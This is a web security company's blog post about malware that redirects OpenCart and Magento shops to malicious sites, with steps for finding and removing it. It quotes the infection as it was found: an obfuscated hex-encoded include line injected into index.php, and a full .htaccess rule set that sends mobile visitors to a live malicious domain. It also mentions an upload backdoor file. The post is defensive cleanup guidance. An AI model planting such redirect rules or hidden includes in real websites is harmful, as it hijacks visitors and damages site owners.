Opencart Magento website redirecting to malware sites

An OpenCart & Magento malware redirecting both desktop and mobile websites to malicious links has been doing rounds. Since last week we have encountered several cases of this malware. There are no specific versions which are being targeted as we have seen this infection in a wide range of versions in both Magento & OpenCart.

Also, check our in-detailed blog post on the different type of malicious redirection and how to fix them.

How Does the Infection Look?

Ahead of blackfriday & cybermonday sales, this malware redirects anyone who visits the infected website to a website containing some offers. Either the websites where this is redirected have some offers or graphic content from porn-like looking websites. One of the customers that came to us has managed to remove some parts of the malware from the desktop website but still, it persisted on the mobile website. Here’s how the this OpenCart & Magento malware redirecting infected website looks:

 

Consequences of Redirection Malware:

  • Redirection to malicious websites
  • Negative effect on search results
  • Increase in the creation of 404 pages
  • Errors in google webmasters
  • Increase in malicious files on the server
  • Decrease in traffic & sales due to above all

How to Find & Fix this OpenCart & Malware Website Redirection Spam:

The steps below might advise you to delete some pieces of code. However, sometimes hackers make malicious code look like legit one. So before deleting any files or code, it is recommended to take a backup. Below are the steps to find & fix:

  • Check index.php file: We found malicious code included in an index file. The malicious part of the code is encoded and it is difficult to tell what is does without decoding it. Here’s a snippet:
    <?php
    /*2e920*/
    
    @include "\x2fh\x6fm\x65/\x6ez\x67a\x72d\x65n\x2fp\x75b\x6ci\x63_\x68t\x6dl\x2fs\x79s... [[MALICIOUS CODE]]";
    
    /*2e920*/
    // Version
    define('VERSION', '2.0.1.0');
    
    // Configuration
    if (is_file('config.php')) {
    	require_once('config.php');
    }
    
    // Install
    if (!defined('DIR_APPLICATION')) {
    	header('Location: install/index.php');
    	exit;
    }
    
    // Startup
    require_once(DIR_SYSTEM . 'startup.php');
    
    // Registry
    $registry = new Registry();

    If you find this piece of code on the top of your index file, it is recommended to delete.

  • Be Sure to Check .htaccess: Another instance of malware can be found in .htaccess file of your server. Be sure to check .htaccess in root folder as well as the one in /admin folder also. A snipped from malware found in /admin folder:
    
    RewriteEngine on
    RewriteCond %{HTTP_USER_AGENT} android [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} opera\ mini [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} blackberry [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} iphone [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} (pre\/|palm\ os|palm|hiptop|avantgo|plucker|xiino|blazer|elaine) [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} (iris|3g_t|windows\ ce|opera\ mobi|windows\ ce;\ smartphone;|windows\ ce;\ iemobile) [NC,OR]
    RewriteCond %{HTTP:Accept} (text\/vnd\.wap\.wml|application\/vnd\.wap\.xhtml\+xml) [NC,OR]
    RewriteCond %{HTTP:Profile} .+ [NC,OR]
    RewriteCond %{HTTP:Wap-Profile} .+ [NC,OR]
    RewriteCond %{HTTP:x-wap-profile} .+ [NC,OR]
    RewriteCond %{HTTP:x-operamini-phone-ua} .+ [NC,OR]
    RewriteCond %{HTTP:x-wap-profile-diff} .+ [NC]
    RewriteCond %{QUERY_STRING} !noredirect [NC]
    RewriteCond %{HTTP_USER_AGENT} !^(Mozilla\/5\.0\ \(Linux;\ U;\ Android\ 2\.2;\ en-us;\ Nexus\ One\ Build/FRF91\)\ AppleWebKit\/533\.1\ \(KHTML,\ like\ Gecko\)\ Version\/4\.0\ Mobile\ Safari\/533\.1\ offline)$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !(windows\.nt|bsd|x11|unix|macos|macintosh|playstation|google|yandex|bot|libwww|msn|america|avant|download|fdm|maui|webmoney|windows-media-player) [NC]
    RewriteRule ^(.*)$ http://sswim.ru [L,R=302]
    

    All this code present in .htaccess file is malicious. This code redirects mobile devices to malicious domains. If you find this code, it should be removed immediately.

  • Look for fishy php files: This is the tricky part. Hackers usually name the files as very legit looking ones and tend to put malicious code in them. Sometimes a lot of code in these legit-looking files is non-harmful but there are a couple of lines that are working for the hackers. In this particular case we have found files like enjoy.php & unzip.php in various OpenCart/Magento directories.
    opencart & magento malware redirections
    This file called unzip.php allowed uploading of malicious files to the server
  • Webmasters don’t lie: Google often warns you if while indexing the website it detects fishy. And if Google is warning you, then you should be worried because this is when your search rankings can take a hit. Something similar happened in Japanese SEO Spam also, which has still been going around. Here’s an example of too many 404 pages being created by malware and google detecting it:OpenCar and Magento Malware Protection

Here’s what you can do from here..

Infections like these hit your business really hard. Every hour of downtime is the loss of customers, reputation and most importantly bad impact on search engine rankings. Hackers after infecting the website have a tendency of leaving backdoors which are difficult to detect even by tech-savvy people. It is important to take a lesson from hacks like these and use a website firewall which protects your website 24x7x365!

For now, if you need assistance in fixing this mess we’ll be happy to do for you. Just sign-up here and our engineers begin the cleanup process within 10-minutes of your signing up.

 

Waiting to Get Hacked?

Get security tips & latest vulnerability fixes right in your inbox:

About The Author

Shikhil plays on the line between security and marketing. When not thinking about how to make Astra super simple, Shikhil can be found enjoying alternative rock or a game of football.

4 Comments

  1. 20 Must- Know Hack Terminologies To Safeguard Your Online Business from Hackers - Astra Web Security Blog - Reply

    […] instance, a recent malware functioned by redirecting both Opencart and Magento desktop and mobile websites to malicious links. […]

  2. Detailed Guide on Website Malware Attacks: Causes, Consequences & Steps to Fix - Astra Web Security Blog - Reply

    […] Looking for malicious code in your index.php, searching for unwanted php files in core CMS files and checking your webmasters search console are the key things here. A more elaborate guide on how to deal with redirection issue can be found here. […]

  3. How to identify and secure Joomla admin security? - Reply

    […] in the database when you log in, or weird behavior such as when you visit your site and then it redirects you to a different […]

  4. Magento Hacked: These Magento Vulnerabilities Can Be The Cause - Reply

    […] The site appears to be infected with malicious redirects. […]

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Close